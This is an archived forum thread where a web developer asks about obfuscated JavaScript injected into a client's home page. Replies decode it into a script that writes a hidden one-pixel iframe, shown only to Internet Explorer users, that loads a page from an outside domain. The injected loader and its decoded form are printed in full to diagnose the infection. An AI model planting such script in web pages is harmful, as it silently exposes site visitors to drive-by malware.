Hello,
I'm hoping someone might help us understand the code listed below.
One of our clients has been having unknown Javascript appear in their
home page.
The client swears that they are not changing the page and we have been
on vacation since we last removed the first 'unknown' code.
The following code appears this week on their site:
<script language=JavaSc ript>function decrypt_p(x){va r
l=x.length,b=10 24,i,j,r,p=0,s= 0,w=0,t=Array(6 3,25,32,12,23,2 6,22,33,27,8,0, 0,0,0,0,0,51,44 ,41,20,46,52,18 ,42,0,49,29,60, 50,11,36,13,48, 35,15,10,55,34, 56,37,57,21,39, 0,0,0,0,3,0,2,3 0,61,14,31,1,62 ,19,7,58,16,54, 9,45,5,17,6,47, 59,24,40,38,28, 4,43,53);for(j= Math.ceil(l/b);j>0;j--){r='';for(i=Ma th.min(l,b);i>0 ;i--,l--){w|=(t[x.charCodeAt(p+ +)-48])<<s;if(s){r+=S tring.fromCharC ode(165^w&255); w>>=8;s-=2}else{s=6}}do cument.write(r) }}decrypt_p("rv BcveRszie7mhKLa _OIa_3vigdIhhAc qeO@Yic786VExeJ 7ienLF8OP4rdI9_ 3vMhKE3M3IpyKzM FwzYrdI9_AZoLKP olVI4yAE6_Kzyh3 LHQmviUd@qenL6y KPp49sMiOP4r3Pp 49VJ4JLSeOP4e9Q ojJ7oSO@MiALFru zphwEk8OviqDLM_ K7b6t7fyAIkQ3PM icUFeO@p_wQavms QeRXu_b7Mh3LHQX 7zhAPH8DLMiOI3r 3P4et76enItbt@p iJzeGuUF8cPaRwP aeJEwTAP_iKUM_w ESFwPhytWFSBUfR KPay9@Mi3PJrtzO 4c7oSO@fiJ@tb9W i6t@H@APOiOviFX 7odKzxQ3PiyKzf_ KztbtWiD1vSLgVT hdj2rB23jml1Guc veRszi0v")</script>
Has anyone seen this before? I did a quick search and it mentioned
somehting about it being and encryption technique.
Previously we had a script that called pop-up ads. We removed that, 3
days later (from server logs) this appeared.
Could the hosting company be compromized?
Any information or insight is much appreciated.
Cheers,
Ken
5  2751 
It looks to act upon a big old string of encoded material to produce
something written into the document.
It would help to know in what context this piece of script appeared. ke*********@gma il.com wrote:
Hello,
I'm hoping someone might help us understand the code listed below.
One of our clients has been having unknown Javascript appear in their
home page.
The client swears that they are not changing the page and we have been
on vacation since we last removed the first 'unknown' code.
The following code appears this week on their site:
<script language=JavaSc ript>function decrypt_p(x){va r
l=x.length,b=10 24,i,j,r,p=0,s= 0,w=0,t=Array(6 3,25,32,12,23,2 6,22,33,27,8,0, 0,0,0,0,0,51,44 ,41,20,46,52,18 ,42,0,49,29,60, 50,11,36,13,48, 35,15,10,55,34, 56,37,57,21,39, 0,0,0,0,3,0,2,3 0,61,14,31,1,62 ,19,7,58,16,54, 9,45,5,17,6,47, 59,24,40,38,28, 4,43,53);for(j= Math.ceil(l/b);j>0;j--){r='';for(i=Ma th.min(l,b);i>0 ;i--,l--){w|=(t[x.charCodeAt(p+ +)-48])<<s;if(s){r+=S tring.fromCharC ode(165^w&255); w>>=8;s-=2}else{s=6}}do cument.write(r) }}decrypt_p("rv BcveRszie7mhKLa _OIa_3vigdIhhAc qeO@Yic786VExeJ 7ienLF8OP4rdI9_ 3vMhKE3M3IpyKzM FwzYrdI9_AZoLKP olVI4yAE6_Kzyh3 LHQmviUd@qenL6y KPp49sMiOP4r3Pp 49VJ4JLSeOP4e9Q ojJ7oSO@MiALFru zphwEk8OviqDLM_ K7b6t7fyAIkQ3PM icUFeO@p_wQavms QeRXu_b7Mh3LHQX 7zhAPH8DLMiOI3r 3P4et76enItbt@p iJzeGuUF8cPaRwP aeJEwTAP_iKUM_w ESFwPhytWFSBUfR KPay9@Mi3PJrtzO 4c7oSO@fiJ@tb9W i6t@H@APOiOviFX 7odKzxQ3PiyKzf_ KztbtWiD1vSLgVT hdj2rB23jml1Guc veRszi0v")</script>
Has anyone seen this before? I did a quick search and it mentioned
somehting about it being and encryption technique.
Previously we had a script that called pop-up ads. We removed that, 3
days later (from server logs) this appeared.
Could the hosting company be compromized?
Any information or insight is much appreciated.
Cheers,
Ken
drclue wrote:
It looks to act upon a big old string of encoded material to produce
something written into the document.
It would help to know in what context this piece of script appeared.
The code was inserted into the body of the page, directly after the
<bodytag.
The page does not appear to have any text, other than what the client
has supplied, appearing on the page after it appears in the browser. ke*********@gma il.com wrote:
decrypt_p("rvBc veRszie7mhKLa_O Ia_3vigdIhhAcqe O@Yic786VExeJ7i enLF8OP4rdI9_3v MhKE3M3IpyKzMFw zYrdI9_AZoLKPol VI4yAE6_Kzyh3LH QmviUd@qenL6yKP p49sMiOP4r3Pp49 VJ4JLSeOP4e9Qoj J7oSO@MiALFruzp hwEk8OviqDLM_K7 b6t7fyAIkQ3PMic UFeO@p_wQavmsQe RXu_b7Mh3LHQX7z hAPH8DLMiOI3r3P 4et76enItbt@piJ zeGuUF8cPaRwPae JEwTAP_iKUM_wES FwPhytWFSBUfRKP ay9@Mi3PJrtzO4c 7oSO@fiJ@tb9Wi6 t@H@APOiOviFX7o dKzxQ3PiyKzf_Kz tbtWiD1vSLgVThd j2rB23jml1Gucve Rszi0v")</script>
This is what is run when the page loads. This calls the decrypt
function and passes it this long string of "garbage".
the decrypt function decodes this into the following javascript program
and inserts it into the web page.
<SCRIPT language="JavaS cript">
var browserName=nav igator.appName;
if (browserName==" Microsoft Internet Explorer") {
window.status=" Done";
document.write( '<IFRAME name="PageConta iner"
src="http://wsfgfdgrtyhgfd. net/adv/077/dffg/index.php" width="1"
height="1" frameborder="0" ></IFRAME>');
}
</SCRIPT>
As you can see, the spyware targets only microsoft internet explorer
likely because it has some security flaw the site wants to exploit.
Basically a web page with the decrypt function will set up a small
iframe (1 pixel in size) and load the page at http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php
Which is presently recorded as being owned by:
Domain Name: WSFGFDGRTYHGFD. NET
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC .com
Referral URL: http://www.OnlineNIC.com
Name Server: NS4.ASDBIZ.BIZ
Name Server: NS3.ASDBIZ.BIZ
Status: ACTIVE
EPP Status: ok
Updated Date: 15-Nov-2006
Creation Date: 12-Oct-2006
Expiration Date: 12-Oct-2007
The web server for this domain is presently down so what the iframe was
actually doing is an open question.
But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.
--------------------------------------------------------------------------- http://www.hunlock.com -- Permanently under construction (And proud of it!)
$FA
pcx99 wrote:
>
The web server for this domain is presently down so what the iframe was
actually doing is an open question.
But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.
Wow, thank you.
Could I assume that this spyware is on the hosts server?
We're developing on the Mac using Text & Dreamweaver. I've done a virus
scan and haven't found anything at all.
Many thanks for the insight.
Cheers,
Ken
More about it here: http://www.aboutus.org/Wsfgfdgrtyhgfd.net
On Nov 25, 6:42 pm, "Mr. Ken" <ken.robe...@gm ail.comwrote:
pcx99 wrote:
The web server for this domain is presently down so what the iframe was
actually doing is an open question.
But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.Wow, thank you.
Could I assume that this spyware is on the hosts server?
We're developing on the Mac using Text & Dreamweaver. I've done a virus
scan and haven't found anything at all.
Many thanks for the insight.
Cheers,
Ken
This thread has been closed and replies have been disabled. Please start a new discussion. Similar topics | |
by: Cardman |
last post by:
Greetings,
I am trying to solve a problem that has been inflicting my self
created Order Forms for a long time, where the problem is that as I
cannot reproduce this error myself, then it is difficult to know what
is going on.
One of these Order Forms you can see here...
http://www.cardman.co.uk/orderform.php3
|
by: TrvlOrm |
last post by:
Can any one please help me...I am new to JavaScript and I have been
struggling with this code for days now and can't figure it out.
I would like to get the Buttons to correspond with the action to
either a) generate numbers b) Prompts a user to locate a web page c)
go to previous page in history list d) Loads next page in history list
e) Promps the user for a URL and loads the web page in a new window f)
and Re-Sizes the window.
...
|
by: Matt Kruse |
last post by:
http://www.JavascriptToolbox.com/bestpractices/
I started writing this up as a guide for some people who were looking for
general tips on how to do things the 'right way' with Javascript. Their code
was littered with document.all and eval, for example, and I wanted to create
a practical list of best practices that they could easily put to use.
The above URL is version 1.0 (draft) that resulted. IMO, it is not a
replacement for the FAQ,...
|
by: Klaus Johannes Rusch |
last post by:
IE7 returns "unknown" instead of "undefined" when querying the type of
an unknown property of an object, for example
document.write(typeof window.missingproperty);
Has "unknown" been defined as a valid return value for the typeof
operator in a later version of ECMAScript or is this a JScript "feature"?
--
Klaus Johannes Rusch
|
by: Chris |
last post by:
Hi,
I have a form for uploading documents and inserting the data into a mysql
db. I would like to validate the form. I have tried a couple of Javascript
form validation functions, but it appears that the data goes straight to the
processing page, rather than the javascript seeing if data is missing and
popping up an alert. I thought it may be because much of the form is
populated with data from the db (lists, etc.), but when I leave...
| | |
by: Mark Rae |
last post by:
Hi,
Just had an interesting message from someone who was unable to view one of
my sites because they have JavaScript turned off, and expecting me to
re-write my site so that they could view it...
I'm interested in hearing other people's opinions about this. I use
JavaScript all the time, and can't really imagine ASP.NET development
without it...
|
by: TARUN |
last post by:
Hello All,
I am facing problem regarding Atlas.
I have install the AtlasSetup.msi in my .NET framework 2.0, and i open
the new Atlas Website......
Let me first explain the my senario,
I have data grid(5 colunm datagrid) on my Page. It's First Colunm is
LinkButton whose text property contain the ID. As i click on the this
|
by: John |
last post by:
Hi Everyone,
I'm having this extremely annoying problem with Internet Explorer 6,
giving me an error message saying "unknown runtime error" whenever I
try to alter the contents of a <divelement using innerHTML.
Now, I've researched this problem on the web, and found many references
to it, but none of them quite addressed my specific situation, and
since my experience with JavaScript is limited, I was not able to adapt
the solutions I...
|
by: willCrain |
last post by:
I am pretty much stuck and dont know which direction to procede in figuring this out. My desired end result is to have top_home button and bottom_home button to be on opposite areas of the page, but when I rollover top_home or bottom_home the other reacts with thier own roll over state as though they are just one button. (rollover 1 and both activate the rollover state) Of course I cant have just one large button layingg over the entire page...
|
by: Oralloy |
last post by:
Hello folks,
I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>".
The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed.
This is as boiled down as I can make it.
Here is my compilation command:
g++-12 -std=c++20 -Wnarrowing bit_field.cpp
Here is the code in...
|
by: jinu1996 |
last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven tapestry of website design and digital marketing. It's not merely about having a website; it's about crafting an immersive digital experience that captivates audiences and drives business growth.
The Art of Business Website Design
Your website is...
| | |
by: tracyyun |
last post by:
Dear forum friends,
With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each protocol has its own unique characteristics and advantages, but as a user who is planning to build a smart home system, I am a bit confused by the choice of these technologies. I'm particularly interested in Zigbee because I've heard it does some...
|
by: agi2029 |
last post by:
Let's talk about the concept of autonomous AI software engineers and no-code agents. These AIs are designed to manage the entire lifecycle of a software development project—planning, coding, testing, and deployment—without human intervention. Imagine an AI that can take a project description, break it down, write the code, debug it, and then launch it, all on its own....
Now, this would greatly impact the work of software developers. The idea...
|
by: isladogs |
last post by:
The next Access Europe User Group meeting will be on Wednesday 1 May 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM).
In this session, we are pleased to welcome a new presenter, Adolph Dupré who will be discussing some powerful techniques for using class modules.
He will explain when you may want to use classes instead of User Defined Types (UDT). For example, to manage the data in unbound forms.
Adolph will...
|
by: TSSRALBI |
last post by:
Hello
I'm a network technician in training and I need your help.
I am currently learning how to create and manage the different types of VPNs and I have a question about LAN-to-LAN VPNs.
The last exercise I practiced was to create a LAN-to-LAN VPN between two Pfsense firewalls, by using IPSEC protocols.
I succeeded, with both firewalls in the same network. But I'm wondering if it's possible to do the same thing, with 2 Pfsense firewalls...
|
by: 6302768590 |
last post by:
Hai team
i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated we have to send another system
|
by: muto222 |
last post by:
How can i add a mobile payment intergratation into php mysql website.
| | |
by: bsmnconsultancy |
last post by:
In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence can significantly impact your brand's success. BSMN Consultancy, a leader in Website Development in Toronto offers valuable insights into creating effective websites that not only look great but also perform exceptionally well. In this comprehensive...
| |
